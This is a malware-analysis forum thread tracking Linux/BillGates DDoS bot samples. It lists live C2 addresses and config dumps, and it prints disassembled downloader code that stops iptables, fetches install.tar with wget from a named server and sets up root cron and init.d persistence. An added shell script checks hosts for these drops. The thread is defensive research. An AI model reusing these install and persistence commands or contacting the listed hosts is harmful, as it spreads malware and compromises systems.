Linux/BillGates

Forum for analysis and discussion about malware.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Thu Sep 11, 2014 9:55 pm

Exactly the same variant, with 13 flooders, VT are:
https://www.virustotal.com/en/file/c101 ... 410055879/
https://www.virustotal.com/en/file/e275 ... 409011038/
Same variant as the one previously posted, with the below panel:
Image
If you see the dropped encrypted config in the default directory:

Code:

00000000  41 00 00 00 00 f4 01 00  00 32 00 00 00 e8 03 00  |A........2......|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 01 01  |................|
00000020  02 00 00 00 01 00 00 00  4e 2e 25 45 4e 2e 25 45  |........N.%EN.%E|
00000030  4e 2e 25 45 4e 2e 25 45  4e 2e 25 45 ff ff 01 00  |N.%EN.%EN.%E....|
00000040  00 00 00 00 00                                    |.....|
00000045

That is exactly the data sent during initiation protocol to the CNC:
Image
One more drop in /tmp contains the parent process ID to be killed.

Code:

$ cat /tmp/gates.note
14018

CNC:

Code:

sa_family=AF_INET, sin_port=htons(15555), sin_addr=inet_addr("183.56.173.50")
IPv4 225523365 0t0 TCP MMD-BANGS-YOU-GOOD.malwaremustdie.org:36345->183.56.173.50:15555 (ESTABLISHED)

Location:
183.56.173.50||4134 | 183.0.0.0/10 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK 

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Sun Sep 14, 2014 7:57 pm

New sample: https://www.virustotal.com/en/file/8ed3 ... 410634927/
Feel free to contribute to analyzing it, as posted previously.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Thu Sep 18, 2014 6:04 pm

Thank you to anonymous sample contributor.
This is the BillGates sample, age: about 1 week+ ago,
VT: https://www.virustotal.com/en/file/735f ... 410773773/

Slight changes detected in (project's) source files:

Code:

crtstuff.c
AmpResource.cpp
Attack.cpp
CmdMsg.cpp
ConfigDoing.cpp
DNSCache.cpp
ExChange.cpp
Global.cpp
Main.cpp
Manager.cpp
MiniHttpHelper.cpp
ProtocolUtil.cpp
ProvinceDns.cpp
StatBase.cpp
SysTool.cpp
ThreadAtk.cpp
ThreadClientStatus.cpp
ThreadConnection.cpp
ThreadDoFun.cpp
ThreadFakeDetect.cpp
ThreadHttpGet.cpp
ThreadKillChaos.cpp
ThreadLoopCmd.cpp
ThreadMonGates.cpp
ThreadRecycle.cpp
ThreadShell.cpp
ThreadShellRecycle.cpp
ThreadTask.cpp
ThreadTns.cpp
ThreadUpdate.cpp
UserAgent.cpp
AutoLock.cpp
FileOp.cpp
Ijduy.cpp
Iysd76.cpp
Log.cpp
Md5.cpp
Media.cpp
NetBase.cpp
ThreadCondition.cpp
Thread.cpp
ThreadMutex.cpp
Utility.cpp
WinDefSVC.cpp

and minor updates in symbols used in attack functions:

Code:

11CAttackBase
13CPacketAttack
10CAttackUdp
10CAttackSyn
11CAttackIcmp
10CAttackDns
10CAttackAmp
10CAttackPrx
15CAttackCompress
10CTcpAttack
9CAttackCc
10CAttackTns
9CAttackIe

The other parts seem to be similar to the previous ones.

The malware file name is "8520"; this is exactly the port number this BillGates used to connect to the CNC:

Code:

tagged 0x990 setsockopt(4, SOL_SOCKET, SO_REUSEADDR, [1], 4)
tagged 0x990 setsockopt(4, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8)
tagged 0x990 time(NULL)
tagged 0x990 fcntl64(4, F_GETFL)
tagged 0x990 fcntl64(4, F_SETFL, O_RDWR|O_NONBLOCK)
tagged 0x990 connect(4, {sa_family=AF_INET, sin_port=htons(8520), sin_addr=inet_addr("122.224.48.63")}, 16)

CNC is in here:

Code:

122.224.48.63||4134 | 122.224.0.0/12 | CHINANET | CN | - | MOVEINTERNET NETWORK TECHNOLOGY CO. LTD.

PoC of the ALIVE connection:

Code:

8520 31539 31963   mmd    4u  IPv4 234322113   0t0   TCP MMD-BANGS-YOU:60029->122.224.48.63:8520 (ESTABLISHED)

Except for the autostart, please be aware of these drops:

Code:

 $ mydump /tmp/gates.lod < shows PID..
00000000  33 31 35 33 39                                    |(REDACTED)|
00000005

 $ mydump ./conf.n < Shows initial comm to send to CNC
00000000  45 00 00 00 00 f4 01 00  00 32 00 00 00 e8 03 00  |E........2......|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 01 01  |................|
00000020  02 00 00 00 01 00 00 00  4e 2e 25 45 4e 2e 25 45  |........N.%EN.%E|
00000030  4e 2e 25 45 4e 2e 25 45  4e 2e 25 45 ff ff 01 00  |N.%EN.%EN.%E....|
00000040  00 00 00 00 00 00 00 00  00                       |.........|
00000049

For the evidence of crime :)) this is the DDoS I recorded, see how port 80 & 443 are used for HTTP & HTTPS attack: https://gist.githubusercontent.com/unix ... Record.txt
#MalwareMustDie!

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Fri Sep 19, 2014 12:24 am

1 sample with the age of about 2 months.
https://www.virustotal.com/en/file/8cf9 ... 410791345/
CNC: 162.221.12.154:36000

There is nothing new about the BillGates ELF binary itself, EXCEPT... In this case we spotted accompanied malware sets:
1. The separated ELF downloader+installer (maybe it is an updater module) accompanying the above samples, to kill, download & install ELF BillGates sample sets:
https://www.virustotal.com/en/file/050c ... 409678428/
2. The separated ELF backdoor designed to send backdoor of successful infection status to the CNC:
https://www.virustotal.com/en/file/ef15 ... 410919424/

How the downloader/installer works:

It kills these processes:

Code:

0x80486BF mov     dword ptr [esp], offset command ; "killall -9 kerne"
0x80486C6 call    _system
0x80486CB mov     dword ptr [esp], offset aKillall9Socket ; "killall -9 socket"
0x80486D2 call    _system
0x80486D7 mov     dword ptr [esp], offset aKillall9Cnet2 ; "killall -9 cnet2"
0x80486DE call    _system
0x80486E3 mov     dword ptr [esp], 0Ah ; seconds // sleep to let the process be killed..
0x80486EA call    _sleep
0x80486EF mov     dword ptr [esp], offset aKillall9Cnet2 ; "killall -9 cnet2"
0x80486F6 call    _system
0x80486FB mov     dword ptr [esp], offset aCdEtcInit_dIpt ; "cd / \n /etc/init.d/iptables stop"
0x8048702 call    _system
0x8048707 mov     dword ptr [esp], offset aServiceIptable ; "service iptables stop"
0x804870E call    _system

download and extract malwares in the /bin:

Code:

0x8048734  mov     dword ptr [esp], offset filename ; "/bin/install.tar"
0x804873B  call    _remove
0x8048740  mov     dword ptr [esp+8], offset downip ; "61.147.103.185:8089"
0x8048748  mov     dword ptr [esp+4], offset format ; "wget -c -P /bin http://%s/install.tar"
0x8048750  lea     eax, [ebp+s]
0x8048756  mov     [esp], eax      ; s
0x8048759  call    _sprintf
0x804875E  lea     eax, [ebp+s]
0x8048764  mov     [esp], eax      ; command
0x8048767  call    _system
0x804876C  mov     dword ptr [esp], offset aTarXfBinInstal ; "tar -xf /bin/install.tar -C /bin/"
0x8048773  call    _system
0x8048778  lea     eax, [ebp+s]

Which is ALIVE now, PoC:

Code:

--2014-09-19 09:38:06--  h00p://61.147. 103.185:8089/install.tar
Connecting to 61.147.103.185:8089... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1187840 (1.1M) [application/octet-stream]
Saving to: 'install.tar'
100%[===========>] 1,187,840    802KB/s   in 1.4s
2014-09-19 09:38:07 (802 KB/s) - 'install.tar' saved [1187840/1187840]

copy the BillGates binary to the /root..

Code:

0x80487A3  mov     dword ptr [esp+4], offset aSKerne ; "%s/kerne"
0x80487AB  lea     eax, [ebp+s]
0x80487B1  mov     [esp], eax      ; s
0x80487B4  call    _sprintf
0x80487B9  mov     dword ptr [esp+4], offset aRootKerne ; "/root/kerne"
0x80487C1  lea     eax, [ebp+s]
0x80487C7  mov     [esp], eax      ; filename
0x80487CA  call    mycopyfile

chmod 777 those files..

Code:

0x80487CF  mov     dword ptr [esp], offset aChmod0777BinMy ; "chmod 0777 /bin/mysql515"
0x80487D6  call    _system
0x80487DB  mov     dword ptr [esp], offset aChmod0777BinSo ; "chmod 0777 /bin/socket"
0x80487E2  call    _system
0x80487E7  mov     dword ptr [esp], offset aChmod0777BinCn ; "chmod 0777 /bin/cnet2"
0x80487EE  call    _system
0x80487F3  mov     dword ptr [esp], offset aChmod0755RootK ; "chmod 0755 /root/kerne"
0x80487FA  call    _system
0x80487FF  lea     eax, [ebp+s]

uninterruptedly-creating an end point of comm/returns a descriptor & delete tar installer:

Code:

0x804884C   mov     dword ptr [esp], offset aNohupBinSocket ; "nohup /bin/socket > /dev/null 2>&1 &"
0x8048853   call    _system
0x8048858   mov     dword ptr [esp], offset filename ; "/bin/install.tar"
0x804885F   call    _remove

install scheduler w/ root permission in crontab:

Code:

0x8048BAC   mov     dword ptr [esp], offset aEtcCrontab ; "/etc/crontab"
0x8048BB3   call    _fopen
      :
0x8048BF2   mov     [esp+8], eax
0x8048BF6   mov     dword ptr [esp+4], offset a55RootSS ; "*/55 * * * * root %s/%s \n"

It installs file "taskgrm-" as the init (autostart files)

Code:

0x8048CEC  mov     dword ptr [esp+4], offset aEtcInit_dTaskg ; "/etc/init.d/taskgrm-"
0x8048CF4  mov     dword ptr [esp], offset aBinTaskgrm ; "/bin/taskgrm-"
0x8048CFB  call    mycopyfile
0x8048D00  mov     dword ptr [esp], offset aChmod777EtcIni ; "chmod 777 /etc/init.d/taskgrm-"
0x8048D07  call    _system
0x8048D0C  mov     dword ptr [esp], offset aLnSEtcInit_dTa ; "ln -s /etc/init.d/taskgrm- /etc/rc.d/rc"...
0x8048D13  call    _system
0x8048D18  mov     dword ptr [esp], offset aChmod777EtcRc_ ; "chmod 777 /etc/rc.d/rc5.d/taskgrm-"
0x8048D1F  call    _system
0x8048D24  mov     dword ptr [esp], offset aChkconfigAddTa ; "chkconfig --add taskgrm-"
0x8048D2B  call    _system

nasty isn't it?
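
Added example, not part of the original posts and not unixfreaxjp's code: a shell triage helper that checks a filesystem root for the drops named in the Sep 11, Sep 18 and Sep 19 posts above (the /tmp/gates.* PID files, the installer's files under /bin, /root and /etc/init.d, and the */55 line in /etc/crontab). The names bg_scan, bg_count and BG_PATHS and the ROOT argument are assumptions made for this example.

```shell
#!/bin/sh
# Added triage example; not code from the thread.
# Paths below are the drops named in the posts, relative to the examined root.
BG_PATHS="tmp/gates.note tmp/gates.lod bin/install.tar bin/mysql515 bin/socket
bin/cnet2 bin/taskgrm- root/kerne etc/init.d/taskgrm- etc/rc.d/rc5.d/taskgrm-"

# bg_scan ROOT: print one tab-separated finding per line (FILE, PID or CRON).
# ROOT is "/" on a live host or the mount point of a disk image.
bg_scan() {
    root=${1:-/}
    root=${root%/}
    for p in $BG_PATHS; do
        f="$root/$p"
        # -L also reports a dangling rc5.d symlink
        if [ -e "$f" ] || [ -L "$f" ]; then
            printf 'FILE\t/%s\n' "$p"
        fi
    done
    # gates.note / gates.lod hold a process ID as ASCII digits.
    for n in gates.note gates.lod; do
        f="$root/tmp/$n"
        [ -f "$f" ] || continue
        pid=$(tr -cd '0-9' < "$f" | cut -c1-10)
        if [ -n "$pid" ]; then
            printf 'PID\t%s\t%s\n' "$n" "$pid"
        fi
    done
    # The installer writes "*/55 * * * * root <dir>/<file>" into /etc/crontab.
    if [ -r "$root/etc/crontab" ]; then
        grep -E '^\*/55 \* \* \* \* root ' "$root/etc/crontab" |
        while IFS= read -r line; do
            printf 'CRON\t%s\n' "$line"
        done
    fi
    return 0
}

# bg_count ROOT: number of findings; 0 means none of the listed artifacts.
bg_count() {
    bg_scan "$1" | wc -l | tr -d ' '
}
```

A single hit such as the crontab pattern is a lead for manual review, not proof of infection; several hits together match the installer behaviour described in the post.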

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Fri Sep 19, 2014 4:07 am

Behold.. BillGates for FreeBSD! Wow..these scums seriously want to transform all up *NIX boxes into DDoS army :shock:

Code:

Freebsd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, for FreeBSD 8.4, not stripped
https://www.virustotal.com/en/file/2040 ... 411098480/
Image

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Fri Sep 19, 2014 12:28 pm

Finished categorizing series of infection. Billgates ones are uploaded here.
Image

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Fri Sep 19, 2014 1:27 pm


unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Sat Sep 20, 2014 2:34 am

(Thankfully) someone sent me an old sample (age: 2 weeks 3 days ago), not a surprise that I met a dead CNC.
https://www.virustotal.com/en/file/60cf ... 410943627/
CNC: abu2.jack52088.com (115.231.17.13:36665)
We analyze to take down these CNC, will ignore old samples from now on. rgds

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Sat Sep 20, 2014 5:17 pm

New sample infecting x64 machine: https://www.virustotal.com/en/file/85f8 ... 411229486/
Accompanied by the etc ELF malware supporting hacks (grep PID to kill process, start a process, etc)
https://www.virustotal.com/en/file/552f ... 411225997/
https://www.virustotal.com/en/file/33c1 ... /analysis/
(highlight reversing for the accompanied ELF is written in VT comment)

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Sun Sep 21, 2014 7:18 am
